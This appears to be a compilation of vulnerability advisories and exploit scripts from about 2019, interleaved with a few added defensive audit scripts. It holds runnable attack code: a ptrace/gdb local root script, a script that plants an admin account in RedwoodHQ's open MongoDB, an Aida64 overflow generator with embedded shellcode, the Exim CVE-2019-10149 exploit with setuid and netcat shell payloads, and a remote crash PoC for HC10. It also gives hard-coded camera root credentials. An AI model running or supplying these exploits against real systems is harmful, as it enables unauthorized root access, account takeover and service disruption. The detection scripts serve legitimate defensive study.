-
Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation
[Summary]
The Pronestor service "PNHM" (aka Health Monitoring or HealthMonitor) before 8.1.12.0 has "BUILTIN\Users:(I)(F)" permissions for the "%PROGRAMFILES(X86)%\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe" file, which allows local users to gain privileges via a Trojan horse PronestorHealthMonitor.exe file.

During the installation of Pronestor's Outlook Add-In (version 8.1.11.0 and older) the installer creates a service named PNHM (Pronestor Health Monitoring) that runs as SYSTEM and whose binary has weak file permissions. The vulnerability allows all "Authenticated Users" to potentially execute arbitrary code as SYSTEM on the local system.

[Additional Information]
Tested on: Windows 7
Version: Outlook Add-In 8.1.11.0 and older. Also tested on version 5.1.6.0 with the same result.
Discovered: 06-nov-2018
Reported: 07-nov-2018
Vendor: https://www.pronestor.com/
Vendor confirmed: True
Fixed: Version 8.1.12.0
Attack Type: Local Privilege Escalation
Vulnerability due to: Insecure Permissions
Discoverer: PovlTekstTV
CVE: 2018-19113
Original link: https://gist.github.com/povlteksttv/8f990e11576e1e90e8fb61acf8646d28

[Proof]
C:\Users\povltekst>sc qc PNHM
SERVICE_NAME: PNHM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Pronestor HealthMonitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\povltekst>icacls 'C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe'
C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe BUILTIN\Users:(I)(F)
                                                                                         NT AUTHORITY\SYSTEM:(I)(F)
                                                                                         BUILTIN\Administrators:(I)(F)

Notice: "BUILTIN\Users:(I)(F)". (F) = Full access! This means that an authenticated user can change the file.

[Attack Vectors]
Replace the file "PronestorHealthMonitor.exe" with a malicious file also called "PronestorHealthMonitor.exe". The next time the service (PNHM) starts, the malicious file will be executed as SYSTEM. The service starts on every reboot.

[Affected Component]
PronestorHealthMonitor.exe. This executable is started on every reboot by a service named PNHM running as SYSTEM.
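The weakness above is easy to audit from the two commands the advisory already uses. The following script is an added example (not part of the advisory) that parses `sc qc` and `icacls` output and flags low-privileged principals with write rights on the binary of a service running as LocalSystem; the sample outputs are constructed to mirror the PNHM service.

```python
import re

# Principals that must never be able to replace a binary a SYSTEM service runs.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
    "Everyone",
}
# icacls simple rights and specific rights that allow modifying/replacing the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "D", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<perms>(?:\([^)]*\))+)$")


def parse_sc_qc(output: str) -> dict:
    """Turn `sc qc <name>` output into a dict keyed by the printed field names."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def binary_path_from_sc(fields: dict) -> str:
    """Strip quotes and trailing arguments from BINARY_PATH_NAME."""
    raw = fields.get("BINARY_PATH_NAME", "")
    m = re.match(r'^"([^"]+)"', raw)
    return m.group(1) if m else raw.split(" ")[0]


def parse_icacls(output: str, path: str):
    """Yield (principal, [rights]) for each ACE icacls printed for `path`.
    icacls prints the path in front of the first ACE and indents the rest."""
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = re.findall(r"\(([^)]*)\)", m.group("perms"))
        yield m.group("principal"), rights


def audit_service(sc_output: str, icacls_output: str) -> list:
    """Report low-privileged principals holding write rights on the service binary.
    A finding is 'critical' when the service additionally runs as LocalSystem."""
    fields = parse_sc_qc(sc_output)
    account = fields.get("SERVICE_START_NAME", "")
    path = binary_path_from_sc(fields)
    findings = []
    for principal, rights in parse_icacls(icacls_output, path):
        granted = WRITE_RIGHTS & set(rights)
        if principal in LOW_PRIV_PRINCIPALS and granted:
            findings.append({
                "service": fields.get("SERVICE_NAME"),
                "runs_as": account,
                "binary": path,
                "principal": principal,
                "rights": sorted(granted),
                "critical": account.lower() in ("localsystem", "nt authority\\system"),
            })
    return findings


# Constructed sample output, modelled on the advisory's [Proof] section.
SC_QC_SAMPLE = r"""SERVICE_NAME: PNHM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Pronestor HealthMonitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

ICACLS_SAMPLE = r"""C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe BUILTIN\Users:(I)(F)
                                                                                         NT AUTHORITY\SYSTEM:(I)(F)
                                                                                         BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for finding in audit_service(SC_QC_SAMPLE, ICACLS_SAMPLE):
        print(finding)
```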
-
CentOS 7.6 - 'ptrace_scope' Privilege Escalation
#!/usr/bin/env bash

#######################################################
#                                                     #
#          'ptrace_scope' misconfiguration            #
#            Local Privilege Escalation               #
#                                                     #
#######################################################

# Affected operating systems (TESTED):
# Parrot Home/Workstation 4.6 (Latest Version)
# Parrot Security 4.6 (Latest Version)
# CentOS / RedHat 7.6 (Latest Version)
# Kali Linux 2018.4 (Latest Version)

# Authors: Marcelo Vazquez (s4vitar)
#          Victor Lasa (vowkin)

#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed... [√]
#[*] System seems vulnerable! [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up... [√]
#[*] Spawning root shell... [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#

function startAttack(){
  tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
    if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
      echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
      echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
    fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
  done

  if [ -f /tmp/bash ]; then
    /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
      rm /tmp/bash
      echo -e " [√]"
      echo -ne "[*] Spawning root shell..."
      echo -e " [√]\n"
      tput cnorm && bash -p'
  else
    echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]"
  fi
}

echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  echo " [√]"
  echo -ne "[*] Checking if 'GDB' is installed..."
  if command -v gdb >/dev/null 2>&1; then
    echo -e " [√]"
    echo -e "[*] System seems vulnerable! [√]\n"
    echo -e "[*] Starting attack..."
    startAttack
  else
    echo " [✗]"
    echo "[*] System is NOT vulnerable :( [✗]"
  fi
else
  echo " [✗]"
  echo "[*] System is NOT vulnerable :( [✗]"
fi; tput cnorm
-
RedwoodHQ 2.5.5 - Authentication Bypass
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 14-june-2019
# Exploit Author: EthicalHCOP
# Version: 2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link: https://redwoodhq.com/redwood-download/
# Tested on: Ubuntu and Windows.
# Twitter: @EthicalHcop
# Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: Use RedxploitHQ to create a new Admin user in redwoodhq and get all the functions of the framework
#
# RedwoodHQ doesn't require that MongoDB is installed on the machine because the tool has its own Mongo launcher.
# The problem is that this vendor database doesn't require any authentication to read its data.
# So, I use the same syntax that the framework uses to create my admin user in the database and access the tool.
#
# POC: https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient


def CreateHMAC(Pass):
    # RedwoodHQ stores passwords as HMAC-MD5 under the fixed key 'redwood'
    message = bytes(Pass, encoding='utf8')
    secret = bytes('redwood', encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())


def DbConnect(ip, port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con


def DbDisconnect(con):
    con.close()


def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)


def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: " + str(e))


if __name__ == '__main__':
    start()
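Because the exploit reuses the application's own password transform (HMAC-MD5 keyed with the constant "redwood"), an administrator can reproduce that transform to audit the users collection for planted accounts. The script below is an added example, not part of the exploit above; the user documents are constructed and the `known_admins` inventory is an assumption about what the defender keeps.

```python
import hashlib
import hmac

# Fixed key taken from the exploit above. Because it is a constant in the code base,
# anyone can compute these values: this is a keyed checksum, not a salted password hash.
REDWOOD_HMAC_KEY = b"redwood"


def redwood_password_hash(password: str) -> str:
    """Reproduce RedwoodHQ's stored password value for a given cleartext."""
    return hmac.new(REDWOOD_HMAC_KEY, password.encode("utf8"), hashlib.md5).hexdigest()


def find_suspicious_admins(users: list, known_admins: set) -> list:
    """Flag Admin-role documents that are not in the admin inventory, or whose
    stored hash equals the hash of their own username (password == username,
    which is exactly what the exploit's default 'Badmin'/'Badmin' produces)."""
    findings = []
    for doc in users:
        if doc.get("role") != "Admin":
            continue
        username = doc.get("username", "")
        reasons = []
        if username not in known_admins:
            reasons.append("Admin account missing from inventory")
        stored = doc.get("password", "")
        if hmac.compare_digest(stored, redwood_password_hash(username)):
            reasons.append("password equals username")
        if reasons:
            findings.append({"username": username, "reasons": reasons})
    return findings


# Constructed sample documents in the shape the exploit inserts.
SAMPLE_USERS = [
    {"name": "alice", "username": "alice", "role": "Admin", "tag": [], "status": "",
     "password": redwood_password_hash("correct horse battery staple")},
    {"name": "bob", "username": "bob", "role": "User", "tag": [], "status": "",
     "password": redwood_password_hash("bob")},          # weak, but not an Admin
    {"name": "Badmin", "username": "Badmin", "role": "Admin", "tag": [], "status": "",
     "password": redwood_password_hash("Badmin")},       # what the exploit creates
]
KNOWN_ADMINS = {"alice"}

if __name__ == "__main__":
    # With pymongo this list would come from MongoClient(uri).automationframework.users.find()
    for finding in find_suspicious_admins(SAMPLE_USERS, KNOWN_ADMINS):
        print(finding)
```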
-
CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities
1. Advisory Information
========================================
Title: Clever Dog Smart Camera
Vendor Homepage: http://www.cleverdog.com.cn/
Tested on camera types: DOG-2W, DOG-2W-V4
Vulnerability: Hardware - Multiple Vulnerabilities
Date: 14/06/2019
Author: Alex Akinbi
Twitter: @alexakinbi

1. Unauthenticated file disclosure:
========================================
An attacker on the local network has unauthenticated access to the internal SD card via the HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download the video archive recorded and saved on the attached external memory card. For example:
http://192.168.1.81:8000/20190606

2. Telnet backdoor using default credentials:
========================================
An attacker on the network can log in remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using the username "root" and the password "12345678". These credentials work on all devices.

3. Login password sent over the network unencrypted by the Clever Dog app:
========================================
Using a packet sniffer, an attacker on the same network can capture data packets and view the captured user login password MD5 hash. A weak password can be cracked and used to log in to the user account.

4. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of these vulnerabilities.
-
Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow
#!/usr/bin/python
##########################################################################################################
# Exploit         : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit
# Author          : Nipun Jaswal
# Tested On       : Windows 7 Home Basic(x86)
# Version         : 6.00.5100
# Release Date    : 31/May/2019
# Build           : 21/May/2019
# Vendor Homepage : https://www.aida64.com/downloads
# Software Link   : https://www.aida64.com/products/aida64-engineer
# CVE             : CVE-2019-
##########################################################################################################
##################################Steps to Reproduce######################################################
#1) Open Aida64 Engineer
#2) Navigate to File-> Preferences
#3) Logging --> 'Log Sensor Reading to CSV log File'
#4) Paste the Content from exploit.txt to the 'Log Sensor Reading to CSV log File' field
#5) Press Apply-> OK
#6) Exit the Application via File-->Exit
##########################################//SHELLCODE//###################################################
# msfvenom -p windows/messagebox TEXT=NIPUN-NIPUN -b '\x00\x0a\x0d' -f py --smallest
buf =  ""
buf += "\xb8\xb6\xf7\x5f\x31\xda\xd5\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x42\x31\x47\x14\x83\xef\xfc\x03\x47\x10\x54"
buf += "\x02\x86\xda\x03\x34\x4d\x39\xc7\xf6\x7c\xf3\x50\xc8"
buf += "\x49\x90\x15\x5b\x7a\xd2\x5f\x90\xf1\x92\x83\x23\x43"
buf += "\x53\x30\x4d\x6c\xe8\x70\x8a\x23\xf6\x09\x19\xe2\x07"
buf += "\x20\x22\xf4\x68\x49\xb1\xd3\x4c\xc6\x0f\x20\x06\x8c"
buf += "\xa7\x20\x19\xc6\x33\x9a\x01\x9d\x1e\x3b\x33\x4a\x7d"
buf += "\x0f\x7a\x07\xb6\xfb\x7d\xf9\x86\x04\x4c\xc5\x15\x56"
buf += "\x2b\x05\x91\xa0\xf5\x4a\x57\xae\x32\xbf\x9c\x8b\xc0"
buf += "\x1b\x75\x99\xd9\xe8\xdf\x45\x1b\x05\xb9\x0e\x17\x92"
buf += "\xcd\x4b\x34\x25\x39\xe0\x40\xae\xbc\x1f\xc1\xf4\x9a"
buf += "\xc3\xb3\x37\x50\xf3\x1a\x63\x1c\xe1\xd4\x49\x77\x64"
buf += "\xa8\x43\x64\x2a\xdd\xc4\x8b\x34\xe2\x73\x36\xcf\xa6"
buf += "\xfd\x61\x2d\xab\x86\x8e\x96\x1e\x60\x20\x29\x61\x8f"
buf += "\xb4\x93\x96\x07\xab\x77\x87\x96\x5b\xbb\xf5\x36\xf8"
buf += "\xd3\x8c\x35\x65\x56\x5f\x62\xed\xca\xbb\x9e\x67\x14"
buf += "\x95\x61\x22\xdd\x93\x5f\x9d\x66\x0b\xfd\x53\x25\xcb"
buf += "\x1d\x48\x07\x3c\x42\x6f\x58\x43\x14\xe0\xdf\xe4\xc4"
buf += "\x96\x7e\x72\x61\x25\xe9\x31\x0c\xda\x9a\xf8\x15\x94"
buf += "\x01\xdf\xa3\x2c\x5a\x77\xe3\x7b\xd3\xd0\x6b\xca\xc6"
buf += "\xae\x22\xba\x56\x66\xe4\x6f\x56\xb1\x8c\xdc\xbc\x4a"
buf += "\x05\x3d\x8d\x9e\x47\xed\xbf\x4c\x98\xc1\x71\xb1\x36"
##########################################//SHELLCODE//###################################################
junk = "\x41" * (1106 - len(buf))
seh = "\x87\xe2\x1d\x01"   # 0x011de287 - [aida64.exe]
nseh = "\xeb\xf8\x90\x90"
buffer = junk + buf + "\xe9\xdd\xfe\xff\xff\xcc" + nseh + seh
handle = open("exploit.txt", "w")
handle.write(buffer)
handle.close()
##########################################//END//#########################################################
-
Exim 4.87 - 4.91 - Local Privilege Escalation
#!/bin/bash
#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <[email protected]>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
	echo "$0 [-m METHOD]"
	echo
	echo "-m setuid : use the setuid payload (default)"
	echo "-m netcat : use the netcat payload"
	echo
	exit 1
}

# payload delivery
function exploit()
{
	# connect to localhost:25
	exec 3<>/dev/tcp/localhost/25

	# deliver the payload
	read -u 3 && echo $REPLY
	echo "helo localhost" >&3
	read -u 3 && echo $REPLY
	echo "mail from:<>" >&3
	read -u 3 && echo $REPLY
	echo "rcpt to:<$PAYLOAD>" >&3
	read -u 3 && echo $REPLY
	echo "data" >&3
	read -u 3 && echo $REPLY
	for i in {1..31}
	do
		echo "Received: $i" >&3
	done
	echo "." >&3
	read -u 3 && echo $REPLY
	echo "quit" >&3
	read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>'
echo

# parse command line
while [ ! -z "$1" ]; do
	case $1 in
		-m) shift; METHOD="$1"; shift;;
		* ) usage
		;;
	esac
done
if [ -z $METHOD ]; then
	usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

	# prepare a setuid shell helper to circumvent bash checks
	echo "Preparing setuid shell helper..."
	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
	if [ $? -ne 0 ]; then
		echo "Problems compiling setuid shell helper, check your gcc."
		echo "Falling back to the /bin/sh method."
		cp /bin/sh /tmp/pwned
	fi
	echo

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_SETUID
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	ls -l /tmp/pwned
	/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_NETCAT
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	nc -v 127.0.0.1 31337

# print help
else
	usage
fi
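Two things in the exploit above are visible to a defender: an Exim string-expansion operator (`${run{...}}`) inside a recipient address, and the 31 `Received:` headers it sends to exceed Exim's `received_headers_max` (default 30) so the message is treated as a mail loop. The script below is an added example, not part of the exploit, that looks for both; the log lines and the message are constructed, and their layout follows Exim's default mainlog format as an assumption.

```python
import re

# Expansion operators that have no business inside a mail address.
EXPANSION_RE = re.compile(r"\$\{\s*(run|readsocket|perl|dlfunc|readfile)\s*\{", re.IGNORECASE)
# The \xHH escapes the exploit uses to keep shell metacharacters out of the address.
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
RECEIVED_HEADERS_MAX = 30  # Exim's default received_headers_max


def decode_exim_escapes(s: str) -> str:
    """Render the \\xHH and \\t escapes so an analyst can read the embedded command."""
    s = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)
    return s.replace("\\t", " ")


def scan_mainlog(lines) -> list:
    """Return one finding per log line whose address contains an expansion operator."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = EXPANSION_RE.search(line)
        if not m:
            continue
        # the offending address is the whitespace-delimited token carrying the operator
        token = next((t for t in line.split() if EXPANSION_RE.search(t)), line).rstrip(":,")
        findings.append({
            "line": number,
            "operator": m.group(1).lower(),
            "address": token,
            "decoded": decode_exim_escapes(token),
        })
    return findings


def received_header_count(raw_message: str) -> int:
    """Count Received: headers in the header block of a raw RFC 5322 message."""
    headers = raw_message.replace("\r\n", "\n").split("\n\n", 1)[0]
    return sum(1 for h in headers.split("\n") if h.lower().startswith("received:"))


def exceeds_received_max(raw_message: str) -> bool:
    """True when the message carries more Received: headers than Exim tolerates,
    the mail-loop condition the exploit forces with its 31 Received: lines."""
    return received_header_count(raw_message) > RECEIVED_HEADERS_MAX


# Constructed sample lines (not captured): one benign delivery, then the two
# payload shapes from the exploit above as Exim would log them.
SAMPLE_MAINLOG = [
    "2019-06-16 13:03:02 1hcU5S-0000Xr-9a <= alice@example.test H=(mail.example.test) [203.0.113.7] P=esmtp S=1024 for bob@localhost",
    r"2019-06-16 13:03:09 1hcU5Z-0000Y1-1b <= <> H=localhost [127.0.0.1] P=esmtp S=542 for ${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost",
    r'2019-06-16 13:03:09 1hcU5Z-0000Y1-1b ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost: Too many "Received" headers - suspected mail loop',
]

# Constructed message with the exploit's 31 Received: headers.
SAMPLE_MESSAGE = "".join(f"Received: hop {i}\n" for i in range(1, 32)) + \
    "From: <>\nTo: bob@localhost\n\nbody\n"

if __name__ == "__main__":
    for finding in scan_mainlog(SAMPLE_MAINLOG):
        print(f"line {finding['line']}: ${{{finding['operator']}}} in address -> {finding['decoded']}")
    print("forced mail loop:", exceeds_received_max(SAMPLE_MESSAGE))
```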
-
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
[+] ISR: ApparitionSec

[Vendor]
www.hostingcontroller.com

[Product]
HC10 HC.Server Service 10.14

HC10 is a unified hosting automation control panel for web hosts and cloud-based service providers to manage both Windows and Linux servers simultaneously as part of a single cluster. HC works on an N-tier user model.

[Vulnerability Type]
Remote Invalid Pointer Write

[CVE Reference]
CVE-2019-12323

[Security Issue]
The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794. In addition, this can potentially be leveraged for post-exploitation persistence with SYSTEM privileges if physical access or malware is involved.

If a physical attacker or malware can set its own program in the service failure recovery options, it can be used to maintain persistence. Afterwards, the service can be crashed by sending a malicious request, which in turn starts the attacker's recovery program. The attacker's program can then restart the affected service to try to stay unnoticed by calling "sc start HCServerService".

Service failure recovery options ("enable actions for stops or errors") can be set in the service's "Recovery" properties tab or on the command line. Authentication is not required to reach the vulnerable service; this was tested successfully on Windows 7/10.

SERVICE_NAME: HCServerService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HC Server Service
        DEPENDENCIES       : HCProvisioningService
        SERVICE_START_NAME : LocalSystem

Crash Dump:

INVALID_POINTER_WRITE_EXPLOITABLE

CONTEXT:  (.ecxr)
rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000
rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000
rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000
 r8=000000000000001f  r9=00000000000006fe r10=0000000000000603
r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
HC_Server+0x25b6c:
00000001`40025b6c c68404d001000000 mov     byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=??
Resetting default scope

FAULTING_IP:
HC_Server+25b6c
00000001`40025b6c c68404d001000000 mov     byte ptr [rsp+rax+1D0h],0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 000000000119033d
Attempt to write to address 000000000119033d

PROCESS_NAME:  HC.Server.exe

[Exploit/POC]
1) Configure the HCServerService recovery failure options to an arbitrary program.
2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.

from socket import *

IP = raw_input("[+] HC Server Service IP ")
PORT = 8794
payload = "A" * 4000
s = socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(payload)
s.close()
print "Triggering HC10 Server Service Xploit"
print "hyp3rlinx"

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: May 14, 2019
No reply
Second notification: May 21, 2019
Vendor "will change the implementation soon in any of forthcoming installer.": May 22, 2019
MITRE assigns CVE: May 27, 2019
Vendor: "New installer to be released June 13, 2019"
June 16, 2019: Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Netperf 2.6.0 - Stack-Based Buffer Overflow
# Exploit Author: Juan Sacco <[email protected]> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: Netperf 2.6.0 is a benchmark tool developed by Hewlett Packard that can be used to measure the performance of many different types of networking.
# It provides tests for both unidirectional throughput and end-to-end latency.
#
# Vendor: https://hewlettpackard.github.io/netperf/
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x41424344 in ?? ()
# LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
# EAX  0x6d
# EBX  0x41414141 ('AAAA')
# ECX  0x6f
# EDX  0x430320 (test_name) 'TCP_STREAM'
# EDI  0xb7ea2000 (_GLOBAL_OFFSET_TABLE_)
# ESI  0xbfffd2c0 0x3
# EBP  0x41414141 ('AAAA')
# ESP  0xbfffd280 0x0
# EIP  0x41424344 ('DCBA')
# Invalid address 0x41424344
# Program received signal SIGSEGV (fault address 0x41424344)
#
# PoC: run -a `python -c 'print "A"*8220+"DCBA"'`

from struct import pack

# int mprotect(void *addr, size_t len, int prot);
# define PROT_READ 0x1
# define PROT_WRITE 0x2
# define PROT_EXEC 0x4
#
# gef p mprotect
# $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect>
# gef p read
